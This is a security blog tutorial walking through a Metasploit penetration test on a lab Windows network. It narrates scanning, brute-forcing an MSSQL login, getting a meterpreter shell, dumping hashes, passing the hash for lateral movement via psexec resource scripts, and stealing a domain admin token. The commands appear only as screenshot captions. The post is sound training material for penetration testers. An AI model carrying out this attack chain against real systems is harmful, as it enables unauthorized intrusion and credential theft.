Blogs & Stories

SpiderLabs Blog

Attracting more than a half-million annual readers, this is the security community's go-to destination for technical breakdowns of the latest threats, critical vulnerability disclosures and cutting-edge research.

Metasploit = tips, tricks, hashes and tokens

Metasploit is one of the many tools that can be used during a penetration test, and it actually consists of a whole suite of tools, that forms part of a complete attacking framework. Metasploit is not the best tool for every job during a penetration test. However it definitely has its place, and can be very handy if used appropriately.

For the purpose of this blog I will go through a scenario of steps that might be taken during a penetration test. I will purposely use only Metasploit, doing so trying to demonstrate the potential that Metaspliot has.

It is not sensible to rely exclusively on your tools during a penetration test... as they might be wrong from time to time.

It is good practice to try and verify your results and/or findings with another tool if possible. Naturally nothing beats manual verification, for example if a tool says anonymous FTP is possible, the best is to manually FTP to that host and make sure the tool is correct.

As an attack platform, I will be using Backtrack 5R2, which has Metasploit already installed. Also very important it comes with a postgresql database already setup, connected and ready to accept data.

The scope and target network for this penetration test scenario will be

So, let's start off with some basics…

Open msfconsole, and check the database status.

Screen shot 2012-06-17 at 8.29.12 PM

OK so let's talk about workspaces. In Metasploit workspaces are used as logical units for information. You can have different workspaces for different penetration tests or different locations of the penetration test. It is easy to import and export data between different workspaces.

Screen shot 2012-06-17 at 8.29.58 PM

There are a couple of tables storing the data inside the workspaces like hosts, services, vulns, loot and notes. Information can be added into these tables manually, for example adding a host into the hosts table:

Screen shot 2012-06-17 at 8.31.05 PM
And a service can also be added manually into the services table:

Screen shot 2012-06-17 at 8.32.44 PM

To populate these tables automatically, you can use db_nmap. You can also use your favorite scanning tool, export your results to an xml file, then import the xml file into the Metasploit database. This can be done with using the db_import inside mfsconsole; as you can see various tools are supported:

Screen shot 2012-06-17 at 8.32.59 PM
Let's start by doing a nmap scan:

Screen shot 2012-06-17 at 8.34.57 PM
Taking a look at the hosts table, you can see it contains the scan results:

Screen shot 2012-06-17 at 9.49.50 PM
Taking a look at the services table, we can also display tables with only the fields we want to see:

Screen shot 2012-06-17 at 9.50.32 PM
Because we see so many Windows hosts, let's take a look at a auxilliary module, a smb version scanner:

Screen shot 2012-06-17 at 9.51.26 PM
So we need to specify a target host, with the set command. But we will have to do the hosts one by one. This is one of the places where the metaplot database comes in very handy, we will add hosts from the services database with the port 445 as a file:

Screen shot 2012-06-17 at 9.52.37 PM
After the scan is done we take a look at the services table:

Screen shot 2012-06-17 at 9.53.49 PM

So we have Windows 2003 hosts, only one host has service pack 1 installed. We have the names for the hosts and the Domain name is "TEST".

Other information I'm just guessing is TEST-EMEA-DC-01 is a domain controller and TEST-EMEA-DB-01 might be a database server.

OK, let's look at the potential database server:

Screen shot 2012-06-17 at 9.54.15 PM

So one would assume mssql because it is a Windows host. But that by default runs on TCP port 1433 which is not present. I am going to take a shot in the dark and run a test for mssql:

Screen shot 2012-06-17 at 9.55.28 PM
Seems like we have a winner:

Screen shot 2012-06-17 at 9.56.09 PM

OK, there. It picked up a mssql instance. Running on port 1043, SQLEXPRESS.

It's running version 9.00.4035.00, and according to the build number it's Microsoft SQL 2005 SP3.

We peek into the services table, to see what changed:

Screen shot 2012-06-17 at 9.56.38 PM

It added TCP port 1043 as mssql as well as UDP port 1433, this is the port that gave the real port for mssql away.

Now that we know there is a databse running and on what port, we can do a brute-force attack, using Metasploit yet again.

Screen shot 2012-06-17 at 9.57.36 PM
We set the right RPORT and we are going to try the same password as the username:

Screen shot 2012-06-17 at 9.58.47 PM
Then we run it, and succesfully find the password:

Screen shot 2012-06-17 at 9.59.21 PM

OK, we have the password. So this is our first credential. So we take a look at the creds table:

Screen shot 2012-06-17 at 9.59.36 PM

Exploit time:

Screen shot 2012-06-17 at 10.00.21 PM
So we know the username, password and the port:

Screen shot 2012-06-17 at 10.01.41 PM

Then we have a meterpreter shell:

Screen shot 2012-06-17 at 10.02.22 PM

Background that session. Then we look at the sessions, and we have 1 session:

Screen shot 2012-06-17 at 10.03.28 PM

Next I want to show you some post exploit modules

OK so we can use smart _hashdump to check for hashes. Set SESSIONS and GETSYSTEM parameters:

Screen shot 2012-06-17 at 10.04.30 PM
Then we run it:

Screen shot 2012-06-17 at 10.04.53 PM

OK so we have something in the loot table.

It got SYSTEM priviledges, and was able to get 2 hashes. It seems the true administrator account is "localadmin" seeing the RID is 500. So Adminstrator is just as dummy account.

So we look at the loot table because we haven't already:

Screen shot 2012-06-17 at 10.05.19 PM

So we look at creds, we have 3 already:

Screen shot 2012-06-17 at 10.05.45 PM
We need to test to see if this local admin password is re-used on the other systems.

So we have erveything we need:

Screen shot 2012-06-17 at 10.06.24 PM

First we add the hosts list, from the services table:

Screen shot 2012-06-17 at 10.06.59 PM

So we are not cracking the hash, we are going to simply passing the hash. We also set

USER_AS_PASS to false and BLANK_PASSWORDS to false:

Screen shot 2012-06-17 at 10.09.03 PM

We see lots of successful, logins when we run it:

Screen shot 2012-06-17 at 10.09.21 PM

Loads more credentials found:

Screen shot 2012-06-17 at 10.09.41 PM

So we have the local password for vulnerable Windows systems. We can use the psexec exploit, but you will have to do it one by one. In exploits you have a RHOST not a RHOSTS so you can't give it a list. I want to show you another thing you can use for automation - resource scripts.

With the help of various sources on the Internet, I put together this script. This script can be easily changed and more modules can be added to step through:

Screen shot 2012-06-17 at 10.10.32 PM
We just do the psexec at the moment.

We can't run the resource yet, as by default the payload windows/meterpreter/reverse_tcp is used, the problem with that is the listening port can't be the same, so we use the windows/meterpreter/bind_tcp payload instead:

Screen shot 2012-06-17 at 10.12.07 PM

Then we run my resource script:

Screen shot 2012-06-17 at 10.13.15 PM

We are left with 9 sessions, with the localadmin account:

Screen shot 2012-06-17 at 10.14.16 PM

We then need to try and find some more hashes, now normally we have to do it manually again, by interacting with every session and dumping the hashes.

Instead we can use a post module credential collector. This post module will give us the hashes and also very importantly it will use incognito and look for domain tokens. But again the module needs to be run manually step by step on each session, unless we use another resource file…

Screen shot 2012-06-17 at 10.15.15 PM

Starts collecting hashes and tokens:

Screen shot 2012-06-17 at 10.15.55 PM
Session 5 and session 6 seems to have some interesting domain tokens:

Screen shot 2012-06-17 at 10.16.30 PM

We manage to steal the token and now we have domain admin level access:

Screen shot 2012-06-17 at 10.18.35 PM

This concludes the demonstration of Metasploit and some of its various components within.

Happy Metasploiting…